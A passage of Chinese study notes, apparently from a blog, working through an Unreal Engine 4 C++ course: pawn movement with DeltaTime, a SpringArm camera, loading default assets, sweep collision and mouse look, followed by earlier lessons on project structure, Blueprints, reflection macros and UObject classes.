    void AMyPawn::SetupPlayerInputComponent(UInputComponent* PlayerInputComponent)
    {
    Super::SetupPlayerInputComponent(PlayerInputComponent);

    PlayerInputComponent->BindAxis(TEXT("MoveForward"), this, &AMyPawn::MoveForward);
    PlayerInputComponent->BindAxis(TEXT("MoveRight"), this, &AMyPawn::MoveRight);
    }

    void AMyPawn::MoveForward(float Value)
    {
    Velocity.X = FMath::Clamp(Value, -1.0f, 1.0f) * MaxSpeed;
    }

    void AMyPawn::MoveRight(float Value)
    {
    Velocity.Y = FMath::Clamp(Value, -1.0f, 1.0f) * MaxSpeed;
    }

    506-为何要使用 DeltaTime 进行移动

    ​使用 DeltaTime 进行移动可以使不同帧率下的移动速度保持一致,推导见下面的列表与其后的公式。

    • 设有两玩家,Tick 中每帧增量 $1$ 单位
      P1:$10$ FPS,$\Delta t = 1/10 = 0.1\,\text{s}$
      P2:$5$ FPS,$\Delta t = 1/5 = 0.2\,\text{s}$

    • 不使用 $\Delta t$ 时
      P1:$10 \times 1 = 10$,$1$ 秒内移动了 $10$ 单位
      P2:$5 \times 1 = 5$,$1$ 秒内移动了 $5$ 单位

    • 使用 $\Delta t$ 时
      P1:$10 \times 1 \times 0.1 = 1$,$1$ 秒内移动了 $1$ 单位
      P2:$5 \times 1 \times 0.2 = 1$,$1$ 秒内移动了 $1$ 单位

    • FPS: Frames Per Second
      $60$ FPS 即 $1$ 秒 $60$ 帧
      $30$ FPS 即 $1$ 秒 $30$ 帧

    • Tick 每帧调用
      $\Delta t$(DeltaTime)为两帧之间的间隔
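
    ​用公式概括:设速度为 $v$,一秒内共 $N$ 帧,第 $i$ 帧的间隔为 $\Delta t_i$,则

    $$\text{每秒位移} = \sum_{i=1}^{N} v\,\Delta t_i = v \sum_{i=1}^{N} \Delta t_i = v \times 1\,\text{s}$$

    结果与帧率 $N$ 无关。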

    png

    ​视图中这里可以显示 FPS。

    png

    Content Browser 中按 `` ` `` 键,输入命令 `t.MaxFPS 10` 可以将最大帧率设为 `10`。

    507-添加 SpringArm 组件

    ​修改 MyPawn.h 里的内容,定义变量 class USpringArmComponent* MySpringArm;

    #pragma once

    #include "CoreMinimal.h"
    #include "GameFramework/Pawn.h"
    #include "MyPawn.generated.h"

    UCLASS()
    class MYPROJECT8_API AMyPawn : public APawn
    {
    GENERATED_BODY()

    public:
    // Sets default values for this pawn's properties
    AMyPawn();

    UPROPERTY(VisibleAnywhere, Category = "My Pawn Components")
    class UStaticMeshComponent* MyStaticMesh;

    UPROPERTY(VisibleAnywhere, Category = "My Pawn Components")
    class UCameraComponent* MyCamera;

    UPROPERTY(VisibleAnywhere, Category = "My Pawn Components")
    class USpringArmComponent* MySpringArm;

    UPROPERTY(EditAnywhere, Category = "My Pawn Movement")
    float MaxSpeed;

    protected:
    // Called when the game starts or when spawned
    virtual void BeginPlay() override;

    public:
    // Called every frame
    virtual void Tick(float DeltaTime) override;

    // Called to bind functionality to input
    virtual void SetupPlayerInputComponent(class UInputComponent* PlayerInputComponent) override;

    private:
    void MoveForward(float Value);
    void MoveRight(float Value);
    FVector Velocity;
    };

    ​修改 MyPawn.cpp 里的内容:

    ​原课程使用了:

    MySpringArm->RelativeRotation = FRotator(-45.0f, 0.0f, 0.0f);

    ​但在我这个版本中这个变量变成了私有,应该为:

    MySpringArm->SetRelativeRotation(FRotator(-45.0f, 0.0f, 0.0f));

    ​完整的 MyPawn.cpp 如下:

    #include "MyPawn.h"
    #include "Components/StaticMeshComponent.h"
    #include "Camera/CameraComponent.h"
    #include "Components/InputComponent.h"
    #include "GameFramework/SpringArmComponent.h"

    // Sets default values
    AMyPawn::AMyPawn()
    {
    // Set this pawn to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    RootComponent = CreateDefaultSubobject<USceneComponent>(TEXT("RootComponent"));
    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    MyStaticMesh->SetupAttachment(GetRootComponent());

    MySpringArm = CreateDefaultSubobject<USpringArmComponent>(TEXT("MySprintArm"));
    MySpringArm->SetupAttachment(MyStaticMesh);
    MySpringArm->SetRelativeRotation(FRotator(-45.0f, 0.0f, 0.0f));
    MySpringArm->TargetArmLength = 400.0f;
    MySpringArm->bEnableCameraLag = true;
    MySpringArm->CameraLagSpeed = 3.0f;

    MyCamera = CreateDefaultSubobject<UCameraComponent>(TEXT("MyCamera"));
    MyCamera->SetupAttachment(GetRootComponent());

    MyCamera->SetRelativeLocation(FVector(-300.0f, 0.0f, 300.0f));
    MyCamera->SetRelativeRotation(FRotator(-45.0f, 0.0f, 0.0f));
    MyCamera->SetupAttachment(MySpringArm);

    AutoPossessPlayer = EAutoReceiveInput::Player0;

    MaxSpeed = 300.0f;
    Velocity = FVector::ZeroVector;
    }

    // Called when the game starts or when spawned
    void AMyPawn::BeginPlay()
    {
    Super::BeginPlay();

    }

    // Called every frame
    void AMyPawn::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);
    AddActorLocalOffset(Velocity * DeltaTime, true);
    }

    // Called to bind functionality to input
    void AMyPawn::SetupPlayerInputComponent(UInputComponent* PlayerInputComponent)
    {
    Super::SetupPlayerInputComponent(PlayerInputComponent);

    PlayerInputComponent->BindAxis(TEXT("MoveForward"), this, &AMyPawn::MoveForward);
    PlayerInputComponent->BindAxis(TEXT("MoveRight"), this, &AMyPawn::MoveRight);
    }

    void AMyPawn::MoveForward(float Value)
    {
    Velocity.X = FMath::Clamp(Value, -1.0f, 1.0f) * MaxSpeed;
    }

    void AMyPawn::MoveRight(float Value)
    {
    Velocity.Y = FMath::Clamp(Value, -1.0f, 1.0f) * MaxSpeed;
    }

    ​删除原有的 BP_MyPawn,重新创建一个。然后开跑!

    png

    508-使用 C++ 代码设置模型与材质的默认值

    ​修改 MyPawn.h 里的内容,给 UStaticMeshComponent 和 USpringArmComponent 添加 Get 函数。

    #pragma once

    #include "CoreMinimal.h"
    #include "GameFramework/Pawn.h"
    #include "MyPawn.generated.h"

    UCLASS()
    class MYPROJECT8_API AMyPawn : public APawn
    {
    GENERATED_BODY()

    public:
    // Sets default values for this pawn's properties
    AMyPawn();

    UPROPERTY(VisibleAnywhere, Category = "My Pawn Components")
    class UStaticMeshComponent* MyStaticMesh;

    UPROPERTY(VisibleAnywhere, Category = "My Pawn Components")
    class UCameraComponent* MyCamera;

    UPROPERTY(VisibleAnywhere, Category = "My Pawn Components")
    class USpringArmComponent* MySpringArm;

    UPROPERTY(EditAnywhere, Category = "My Pawn Movement")
    float MaxSpeed;

    FORCEINLINE UStaticMeshComponent* GetStaticMeshComponent() { return MyStaticMesh; }
    FORCEINLINE USpringArmComponent* GetSpringArmComponent() { return MySpringArm; }

    protected:
    // Called when the game starts or when spawned
    virtual void BeginPlay() override;

    public:
    // Called every frame
    virtual void Tick(float DeltaTime) override;

    // Called to bind functionality to input
    virtual void SetupPlayerInputComponent(class UInputComponent* PlayerInputComponent) override;

    private:
    void MoveForward(float Value);
    void MoveRight(float Value);
    FVector Velocity;
    };

    ​修改 MyPawn.cpp 里的内容:

    #include "MyPawn.h"
    #include "Components/StaticMeshComponent.h"
    #include "Camera/CameraComponent.h"
    #include "Components/InputComponent.h"
    #include "GameFramework/SpringArmComponent.h"
    #include "UObject/ConstructorHelpers.h"

    // Sets default values
    AMyPawn::AMyPawn()
    {
    // Set this pawn to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    RootComponent = CreateDefaultSubobject<USceneComponent>(TEXT("RootComponent"));
    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    MyStaticMesh->SetupAttachment(GetRootComponent());

    static ConstructorHelpers::FObjectFinder<UStaticMesh> StaticMeshAsset(TEXT("StaticMesh'/Engine/EngineMeshes/Sphere.Sphere'"));
    static ConstructorHelpers::FObjectFinder<UMaterialInterface> MaterialAsset(TEXT("Material'/Engine/Tutorial/SubEditors/TutorialAssets/TutorialMaterial.TutorialMaterial'"));
    if (StaticMeshAsset.Succeeded() && MaterialAsset.Succeeded())
    {
    MyStaticMesh->SetStaticMesh(StaticMeshAsset.Object);
    MyStaticMesh->SetMaterial(0, MaterialAsset.Object);
    MyStaticMesh->SetWorldScale3D(FVector(0.5f));
    }

    MySpringArm = CreateDefaultSubobject<USpringArmComponent>(TEXT("MySprintArm"));
    MySpringArm->SetupAttachment(GetStaticMeshComponent());
    MySpringArm->SetRelativeRotation(FRotator(-45.0f, 0.0f, 0.0f));
    MySpringArm->TargetArmLength = 400.0f;
    MySpringArm->bEnableCameraLag = true;
    MySpringArm->CameraLagSpeed = 3.0f;

    MyCamera = CreateDefaultSubobject<UCameraComponent>(TEXT("MyCamera"));
    MyCamera->SetupAttachment(GetRootComponent());

    MyCamera->SetRelativeLocation(FVector(-300.0f, 0.0f, 300.0f));
    MyCamera->SetRelativeRotation(FRotator(-45.0f, 0.0f, 0.0f));
    MyCamera->SetupAttachment(GetSpringArmComponent());

    AutoPossessPlayer = EAutoReceiveInput::Player0;

    MaxSpeed = 300.0f;
    Velocity = FVector::ZeroVector;
    }

    // Called when the game starts or when spawned
    void AMyPawn::BeginPlay()
    {
    Super::BeginPlay();

    }

    // Called every frame
    void AMyPawn::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);
    AddActorLocalOffset(Velocity * DeltaTime, true);
    }

    // Called to bind functionality to input
    void AMyPawn::SetupPlayerInputComponent(UInputComponent* PlayerInputComponent)
    {
    Super::SetupPlayerInputComponent(PlayerInputComponent);

    PlayerInputComponent->BindAxis(TEXT("MoveForward"), this, &AMyPawn::MoveForward);
    PlayerInputComponent->BindAxis(TEXT("MoveRight"), this, &AMyPawn::MoveRight);
    }

    void AMyPawn::MoveForward(float Value)
    {
    Velocity.X = FMath::Clamp(Value, -1.0f, 1.0f) * MaxSpeed;
    }

    void AMyPawn::MoveRight(float Value)
    {
    Velocity.Y = FMath::Clamp(Value, -1.0f, 1.0f) * MaxSpeed;
    }

    png

    StaticMeshAsset(TEXT()) 里的值(资源引用路径)可以以此法获得。

    png

    MaterialAsset(TEXT()) 里的值(资源引用路径)可以以此法获得。

    png

    ​编译后删除蓝图,重新构建 BP_MyPawn

    509-Sweep 仅对根组件生效

    ​之前的代码中:

    AddActorLocalOffset(Velocity * DeltaTime, true);

    ​开启了 Sweep 却不能使碰撞生效,这是因为 Sweep 只对根组件生效,因此要修改 MyPawn.cpp,将 MyStaticMesh 设为根组件:

    #include "MyPawn.h"
    #include "Components/StaticMeshComponent.h"
    #include "Camera/CameraComponent.h"
    #include "Components/InputComponent.h"
    #include "GameFramework/SpringArmComponent.h"
    #include "UObject/ConstructorHelpers.h"

    // Sets default values
    AMyPawn::AMyPawn()
    {
    // Set this pawn to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    // RootComponent = CreateDefaultSubobject<USceneComponent>(TEXT("RootComponent"));
    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    RootComponent = MyStaticMesh;
    MyStaticMesh->SetCollisionProfileName(TEXT("Pawn"));

    static ConstructorHelpers::FObjectFinder<UStaticMesh> StaticMeshAsset(TEXT("StaticMesh'/Engine/EngineMeshes/Sphere.Sphere'"));
    static ConstructorHelpers::FObjectFinder<UMaterialInterface> MaterialAsset(TEXT("Material'/Engine/Tutorial/SubEditors/TutorialAssets/TutorialMaterial.TutorialMaterial'"));
    if (StaticMeshAsset.Succeeded() && MaterialAsset.Succeeded())
    {
    MyStaticMesh->SetStaticMesh(StaticMeshAsset.Object);
    MyStaticMesh->SetMaterial(0, MaterialAsset.Object);
    MyStaticMesh->SetWorldScale3D(FVector(0.5f));
    }

    MySpringArm = CreateDefaultSubobject<USpringArmComponent>(TEXT("MySprintArm"));
    MySpringArm->SetupAttachment(GetStaticMeshComponent());
    MySpringArm->SetRelativeRotation(FRotator(-45.0f, 0.0f, 0.0f));
    MySpringArm->TargetArmLength = 400.0f;
    MySpringArm->bEnableCameraLag = true;
    MySpringArm->CameraLagSpeed = 3.0f;

    MyCamera = CreateDefaultSubobject<UCameraComponent>(TEXT("MyCamera"));
    MyCamera->SetupAttachment(GetRootComponent());

    MyCamera->SetRelativeLocation(FVector(-300.0f, 0.0f, 300.0f));
    MyCamera->SetRelativeRotation(FRotator(-45.0f, 0.0f, 0.0f));
    MyCamera->SetupAttachment(GetSpringArmComponent());

    AutoPossessPlayer = EAutoReceiveInput::Player0;

    MaxSpeed = 300.0f;
    Velocity = FVector::ZeroVector;
    }

    // Called when the game starts or when spawned
    void AMyPawn::BeginPlay()
    {
    Super::BeginPlay();

    }

    // Called every frame
    void AMyPawn::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);
    AddActorLocalOffset(Velocity * DeltaTime, true);
    }

    // Called to bind functionality to input
    void AMyPawn::SetupPlayerInputComponent(UInputComponent* PlayerInputComponent)
    {
    Super::SetupPlayerInputComponent(PlayerInputComponent);

    PlayerInputComponent->BindAxis(TEXT("MoveForward"), this, &AMyPawn::MoveForward);
    PlayerInputComponent->BindAxis(TEXT("MoveRight"), this, &AMyPawn::MoveRight);
    }

    void AMyPawn::MoveForward(float Value)
    {
    Velocity.X = FMath::Clamp(Value, -1.0f, 1.0f) * MaxSpeed;
    }

    void AMyPawn::MoveRight(float Value)
    {
    Velocity.Y = FMath::Clamp(Value, -1.0f, 1.0f) * MaxSpeed;
    }

    510-控制视野上下查看

    png

    Project Settings 里添加两个轴 LookUp 和 LookRight。

    ​修改 MyPawn.h 里的内容,定义函数 LookUp() 与 LookRight(),以及鼠标输入 MouseInput:

    #pragma once

    #include "CoreMinimal.h"
    #include "GameFramework/Pawn.h"
    #include "MyPawn.generated.h"

    UCLASS()
    class MYPROJECT8_API AMyPawn : public APawn
    {
    GENERATED_BODY()

    public:
    // Sets default values for this pawn's properties
    AMyPawn();

    UPROPERTY(VisibleAnywhere, Category = "My Pawn Components")
    class UStaticMeshComponent* MyStaticMesh;

    UPROPERTY(VisibleAnywhere, Category = "My Pawn Components")
    class UCameraComponent* MyCamera;

    UPROPERTY(VisibleAnywhere, Category = "My Pawn Components")
    class USpringArmComponent* MySpringArm;

    UPROPERTY(EditAnywhere, Category = "My Pawn Movement")
    float MaxSpeed;

    FORCEINLINE UStaticMeshComponent* GetStaticMeshComponent() { return MyStaticMesh; }
    FORCEINLINE USpringArmComponent* GetSpringArmComponent() { return MySpringArm; }

    protected:
    // Called when the game starts or when spawned
    virtual void BeginPlay() override;

    public:
    // Called every frame
    virtual void Tick(float DeltaTime) override;

    // Called to bind functionality to input
    virtual void SetupPlayerInputComponent(class UInputComponent* PlayerInputComponent) override;

    private:
    void MoveForward(float Value);
    void MoveRight(float Value);
    FVector Velocity;

    void LookUp(float Value);
    void LookRight(float Value);
    FVector2D MouseInput;
    };

    ​修改 MyPawn.cpp 里的内容,完成视野随鼠标向上下查看的功能:

    #include "MyPawn.h"
    #include "Components/StaticMeshComponent.h"
    #include "Camera/CameraComponent.h"
    #include "Components/InputComponent.h"
    #include "GameFramework/SpringArmComponent.h"
    #include "UObject/ConstructorHelpers.h"

    // Sets default values
    AMyPawn::AMyPawn()
    {
    // Set this pawn to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    // RootComponent = CreateDefaultSubobject<USceneComponent>(TEXT("RootComponent"));
    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    RootComponent = MyStaticMesh;
    MyStaticMesh->SetCollisionProfileName(TEXT("Pawn"));

    static ConstructorHelpers::FObjectFinder<UStaticMesh> StaticMeshAsset(TEXT("StaticMesh'/Engine/EngineMeshes/Sphere.Sphere'"));
    static ConstructorHelpers::FObjectFinder<UMaterialInterface> MaterialAsset(TEXT("Material'/Engine/Tutorial/SubEditors/TutorialAssets/TutorialMaterial.TutorialMaterial'"));
    if (StaticMeshAsset.Succeeded() && MaterialAsset.Succeeded())
    {
    MyStaticMesh->SetStaticMesh(StaticMeshAsset.Object);
    MyStaticMesh->SetMaterial(0, MaterialAsset.Object);
    MyStaticMesh->SetWorldScale3D(FVector(0.5f));
    }

    MySpringArm = CreateDefaultSubobject<USpringArmComponent>(TEXT("MySprintArm"));
    MySpringArm->SetupAttachment(GetStaticMeshComponent());
    MySpringArm->SetRelativeRotation(FRotator(-45.0f, 0.0f, 0.0f));
    MySpringArm->TargetArmLength = 400.0f;
    MySpringArm->bEnableCameraLag = true;
    MySpringArm->CameraLagSpeed = 3.0f;

    MyCamera = CreateDefaultSubobject<UCameraComponent>(TEXT("MyCamera"));
    MyCamera->SetupAttachment(GetRootComponent());

    MyCamera->SetRelativeLocation(FVector(-300.0f, 0.0f, 300.0f));
    MyCamera->SetRelativeRotation(FRotator(-45.0f, 0.0f, 0.0f));
    MyCamera->SetupAttachment(GetSpringArmComponent());

    AutoPossessPlayer = EAutoReceiveInput::Player0;

    MaxSpeed = 300.0f;
    Velocity = FVector::ZeroVector;
    }

    // Called when the game starts or when spawned
    void AMyPawn::BeginPlay()
    {
    Super::BeginPlay();

    }

    // Called every frame
    void AMyPawn::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);
    AddActorLocalOffset(Velocity * DeltaTime, true);

    // X, Y, Z 在虚幻的旋转轴对应 Roll, Pitch, Yaw
    FRotator NewSpringArmRotation = MySpringArm->GetComponentRotation();
    NewSpringArmRotation.Pitch = FMath::Clamp(NewSpringArmRotation.Pitch + MouseInput.Y, -80.0f, 0.0f);
    MySpringArm->SetWorldRotation(NewSpringArmRotation);
    }

    // Called to bind functionality to input
    void AMyPawn::SetupPlayerInputComponent(UInputComponent* PlayerInputComponent)
    {
    Super::SetupPlayerInputComponent(PlayerInputComponent);

    PlayerInputComponent->BindAxis(TEXT("MoveForward"), this, &AMyPawn::MoveForward);
    PlayerInputComponent->BindAxis(TEXT("MoveRight"), this, &AMyPawn::MoveRight);
    PlayerInputComponent->BindAxis(TEXT("LookUp"), this, &AMyPawn::LookUp);
    PlayerInputComponent->BindAxis(TEXT("LookRight"), this, &AMyPawn::LookRight);
    }

    void AMyPawn::MoveForward(float Value)
    {
    Velocity.X = FMath::Clamp(Value, -1.0f, 1.0f) * MaxSpeed;
    }

    void AMyPawn::MoveRight(float Value)
    {
    Velocity.Y = FMath::Clamp(Value, -1.0f, 1.0f) * MaxSpeed;
    }

    void AMyPawn::LookUp(float Value)
    {
    MouseInput.Y = FMath::Clamp(Value, -1.0f, 1.0f);
    }

    void AMyPawn::LookRight(float Value)
    {
    MouseInput.X = FMath::Clamp(Value, -1.0f, 1.0f);
    }

    511-使用 Controller 控制视野左右旋转

    ​修改 MyPawn.cpp 里的内容,完成视野随鼠标向左右查看的功能(AddControllerYawInput(MouseInput.X);):

    #include "MyPawn.h"
    #include "Components/StaticMeshComponent.h"
    #include "Camera/CameraComponent.h"
    #include "Components/InputComponent.h"
    #include "GameFramework/SpringArmComponent.h"
    #include "UObject/ConstructorHelpers.h"

    // Sets default values
    AMyPawn::AMyPawn()
    {
    // Set this pawn to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    // RootComponent = CreateDefaultSubobject<USceneComponent>(TEXT("RootComponent"));
    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    RootComponent = MyStaticMesh;
    MyStaticMesh->SetCollisionProfileName(TEXT("Pawn"));

    static ConstructorHelpers::FObjectFinder<UStaticMesh> StaticMeshAsset(TEXT("StaticMesh'/Engine/EngineMeshes/Sphere.Sphere'"));
    static ConstructorHelpers::FObjectFinder<UMaterialInterface> MaterialAsset(TEXT("Material'/Engine/Tutorial/SubEditors/TutorialAssets/TutorialMaterial.TutorialMaterial'"));
    if (StaticMeshAsset.Succeeded() && MaterialAsset.Succeeded())
    {
    MyStaticMesh->SetStaticMesh(StaticMeshAsset.Object);
    MyStaticMesh->SetMaterial(0, MaterialAsset.Object);
    MyStaticMesh->SetWorldScale3D(FVector(0.5f));
    }

    MySpringArm = CreateDefaultSubobject<USpringArmComponent>(TEXT("MySprintArm"));
    MySpringArm->SetupAttachment(GetStaticMeshComponent());
    MySpringArm->SetRelativeRotation(FRotator(-45.0f, 0.0f, 0.0f));
    MySpringArm->TargetArmLength = 400.0f;
    MySpringArm->bEnableCameraLag = true;
    MySpringArm->CameraLagSpeed = 3.0f;

    MyCamera = CreateDefaultSubobject<UCameraComponent>(TEXT("MyCamera"));
    MyCamera->SetupAttachment(GetRootComponent());

    MyCamera->SetRelativeLocation(FVector(-300.0f, 0.0f, 300.0f));
    MyCamera->SetRelativeRotation(FRotator(-45.0f, 0.0f, 0.0f));
    MyCamera->SetupAttachment(GetSpringArmComponent());

    AutoPossessPlayer = EAutoReceiveInput::Player0;
    bUseControllerRotationRoll = true;
    bUseControllerRotationPitch = true;
    bUseControllerRotationYaw = true;

    MaxSpeed = 300.0f;
    Velocity = FVector::ZeroVector;
    }

    // Called when the game starts or when spawned
    void AMyPawn::BeginPlay()
    {
    Super::BeginPlay();

    }

    // Called every frame
    void AMyPawn::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);
    AddActorLocalOffset(Velocity * DeltaTime, true);

    // X, Y, Z 在虚幻的旋转轴对应 Roll, Pitch, Yaw
    AddControllerYawInput(MouseInput.X);

    FRotator NewSpringArmRotation = MySpringArm->GetComponentRotation();
    NewSpringArmRotation.Pitch = FMath::Clamp(NewSpringArmRotation.Pitch + MouseInput.Y, -80.0f, 0.0f);
    MySpringArm->SetWorldRotation(NewSpringArmRotation);
    }

    // Called to bind functionality to input
    void AMyPawn::SetupPlayerInputComponent(UInputComponent* PlayerInputComponent)
    {
    Super::SetupPlayerInputComponent(PlayerInputComponent);

    PlayerInputComponent->BindAxis(TEXT("MoveForward"), this, &AMyPawn::MoveForward);
    PlayerInputComponent->BindAxis(TEXT("MoveRight"), this, &AMyPawn::MoveRight);
    PlayerInputComponent->BindAxis(TEXT("LookUp"), this, &AMyPawn::LookUp);
    PlayerInputComponent->BindAxis(TEXT("LookRight"), this, &AMyPawn::LookRight);
    }

    void AMyPawn::MoveForward(float Value)
    {
    Velocity.X = FMath::Clamp(Value, -1.0f, 1.0f) * MaxSpeed;
    }

    void AMyPawn::MoveRight(float Value)
    {
    Velocity.Y = FMath::Clamp(Value, -1.0f, 1.0f) * MaxSpeed;
    }

    void AMyPawn::LookUp(float Value)
    {
    MouseInput.Y = FMath::Clamp(Value, -1.0f, 1.0f);
    }

    void AMyPawn::LookRight(float Value)
    {
    MouseInput.X = FMath::Clamp(Value, -1.0f, 1.0f);
    }

    png

    这些属性是用于控制 Pawn 的旋转是否受控制器的旋转影响。具体说明如下:

    • bUseControllerRotationRoll:设置为 true 时,表示 Pawn 的 Roll 旋转将受控制器的 Roll 旋转影响。
    • bUseControllerRotationPitch:设置为 true 时,表示 Pawn 的 Pitch 旋转将受控制器的 Pitch 旋转影响。
    • bUseControllerRotationYaw:设置为 true 时,表示 Pawn 的 Yaw 旋转将受控制器的 Yaw 旋转影响。

    当这些属性被设置为 true 时,Pawn 的旋转将由控制器来决定,而不是由组件自身的旋转规则决定。这在某些情况下非常有用,例如第一人称或第三人称视角的角色控制,其中玩家可以通过控制器来旋转角色的方向。
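
    ​例如,只想让 Pawn 跟随控制器水平转身、俯仰交给 SpringArm 处理时,可以只开 Yaw(示意,与本节代码对应):

    // 只让控制器的 Yaw 影响 Pawn 的旋转
    bUseControllerRotationRoll = false;
    bUseControllerRotationPitch = false;
    bUseControllerRotationYaw = true;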

    资源

    环境配置

    ​还是把版本换成 UE4.27 吧,让它支持 VS2022。

    课程

    202-Unreal 项目文件结构解读

    一些子目录是在引擎和游戏项目目录之间通用的:

    • Binaries - 包含可执行文件或编译期间创建的其他文件。

    • Build - 包含构建引擎或游戏所需的文件,包括创建特定于平台的构建版所需的文件。

    • Config - 配置文件,用于设置用来控制引擎行为的值。项目 Config 文件中设置的值会覆盖 Engine\Config 目录中设置的值。

    • Content - 保存引擎或游戏的内容,包括资源包和贴图。

    • DerivedDataCache - 包含加载时针对引用内容生成的派生数据文件。引用内容没有相应的缓存文件会导致加载时间显著延长。

    • Intermediate - 包含构建引擎或游戏时生成的临时文件。在游戏目录中,着色器存储在 Intermediate 目录中。

    • Saved - 包含自动保存、配置(.ini)文件和日志文件。此外,Engine\Saved 目录还包含崩溃日志、硬件信息和 Swarm 选项与数据。

    • Source - 包含引擎或游戏的所有源文件,包括引擎源代码、工具和游戏类等。

      • Engine - Engine 目录中的源文件组织结构如下:

        • Developer - 编辑器和引擎共同使用的文件。
        • Editor - 仅供编辑器使用的文件。
        • Programs - 引擎或编辑器使用的外部工具。
        • Runtime - 仅供引擎使用的文件。
      • Game - 游戏项目源码,建议按模块的方式进行组织。

    ​迁移项目最小的单元是 Config、Content 和 XXX.uproject。

    203-Unreal 缓存数据解读

    png

    ​Epic 中修改保管库的缓存位置。

    png

    ​这个路径存放着着色器的缓存。

    209-C++ 与蓝图的关系与选择

    C++ 与蓝图

    • 两者关系
      • 蓝图建立在 C++ 代码之上
      • 蓝图与 C++ 可以很好地协作
    • 理论平衡
      • C++ 由游戏逻辑程序员使用
        • 完成虚幻尚未封装的功能
        • 完成根据项目需求需要自定义的功能
      • 蓝图由游戏设计人员使用
        • 设计其他游戏资源
        • 功能测试时使用
        • 项目快速迭代时使用
        • 调用编写好的 C++ 代码

    什么是蓝图可视化脚本

    • 蓝图可视化脚本简称“蓝图”、“蓝图脚本”
    • 蓝图是一种可视化编程
      • 实际上,你使用蓝图的时候就是在编程
      • 蓝图是一种需要编译的面向对象的可视化编程语言
    • 蓝图完全集成在虚幻 4 中
    • 通过节点与连线工作

    什么是蓝图系统

    • 蓝图系统俗称“蓝图”、“蓝图类”
    • 将蓝图类想象成游戏内容的容器
      • 其可以包含组件
      • 其可以包含脚本
      • 其可以仅仅包含数据

    301-C++ 基础回顾与虚幻 C++ 类的继承结构

    虚幻引擎 C++ 类层级结构 (Hierarchy)

    • Object

      • 存放数据

      • 不能被放置到场景 (Level) 中

    • Actor

      • 能放置在场景 (Level) 中
      • 可以有视觉表现/可以被看到
    • Pawn

      • 可以被控制器 (Controller) 持有 (Possess)
    • Character

      • 有角色移动组件 (CharacterMovementComponent)
      • 具有适合角色的封装好的一系列功能

    一个 Object 不是 (Is NOT an) Actor

    一个 Object 不是一个 (Is NOT a) Pawn

    一个 Actor 是一个 (Is an) Object

    一个 Actor 不是一个 (Is NOT a) Pawn

    一个 Pawn 是 (Is an) Actor

    一个 Pawn 是 (Is an) Object

    png

    Package、World、Level、Actor 之间的关系。

    302-使用宏参与虚幻的反射与垃圾回收系统

    ​UE4 的反射系统允许在运行时获取类的信息、动态创建对象、调用函数等操作,而无需提前知道类的具体类型。通过反射系统,可以实现诸如蓝图编辑、插件系统、序列化和反序列化等功能。在 UE4 中,反射系统主要基于宏(macros)和元数据(metadata)来实现,开发者可以利用它来实现更灵活的代码设计和功能扩展。(在蓝图脚本中调用 C++ 的内容)

    ​UE4 的垃圾回收系统负责管理动态分配的内存,在运行时自动释放不再需要的内存空间,防止内存泄漏和提高性能。UE4 使用基于引用计数(reference counting)和标记-清除(mark and sweep)算法的混合方式来进行垃圾回收,确保及时释放不再使用的对象,并最大程度地减少性能损耗。

    png

    ​在定义类、变量、函数前分别加上 UCLASS()、UPROPERTY()、UFUNCTION() 这样的宏,就可以参与反射与垃圾回收系统。

    ​引用头文件时,#include "MyActor.generated.h" 务必放在所有引用的头文件的下方。
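
    ​例如(其中 SomeOtherHeader.h 仅为示意):

    #include "CoreMinimal.h"
    #include "GameFramework/Actor.h"
    #include "SomeOtherHeader.h" // 其他头文件都放在上面(示意)
    #include "MyActor.generated.h" // generated.h 必须是最后一个 include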

    303-创建自己的第一个 UObject 子类

    ​新建一个 C++ 项目。

    png

    ​项目中确保打开了 Show C++ Classes

    png

    ​所有 C++ 类都会被存放到 C++ Classes/项目名称 中。

    png

    ​在这个目录下创建一个 C++ class,打开 Show All Classes,创建一个 Object 类。

    png

    ​名字取为 MyObject,则会生成 MyObject.cpp 和 MyObject.h 两个文件。

    .cpp 文件是写逻辑用的,.h 文件是写声明用的。

    ​修改 MyObject.h 文件,然后保存:

    // Fill out your copyright notice in the Description page of Project Settings.

    #pragma once

    #include "CoreMinimal.h"
    #include "UObject/NoExportTypes.h"
    #include "MyObject.generated.h"

    /**
    *
    */
    UCLASS(Blueprintable)
    class MYPROJECT8_API UMyObject : public UObject
    {
    GENERATED_BODY()
    };

    ​通过在类声明前添加 UCLASS(Blueprintable) 宏,可以让该类在 UE4 的蓝图编辑器中可见,允许开发者使用蓝图来创建该类的实例、设置属性和调用函数(在蓝图脚本中调用 C++ 的内容)。

    png

    ​可以用 VS 的生成进行编译(有可能 UE4 没反应过来,但可以方便地显示中文的报错信息)。

    png

    ​也可以用 UE4 的 Compile 按钮编译。

    png

    ​此时所创建的类就可以 Create Blueprint class based on MyObject

    304-加快 Unreal 编译速度

    ​UE4.22 中,每次编译都会重新生成反射代码,影响编译速度(不知道 4.27 还有没有……)。

    ​课程中提到的解决方案是,安装路径下找到 Win64/UnrealHeaderTool.target,往其中的第二行加一个空格……真玄学。

    png

    305-创建 UObject 的蓝图类与基础宏参数介绍

    png

    ​对于之前所创建的 MyObject 类,选择 Create Blueprint class based on MyObject 以创建一个反射的蓝图,命名为 BP_MyObject

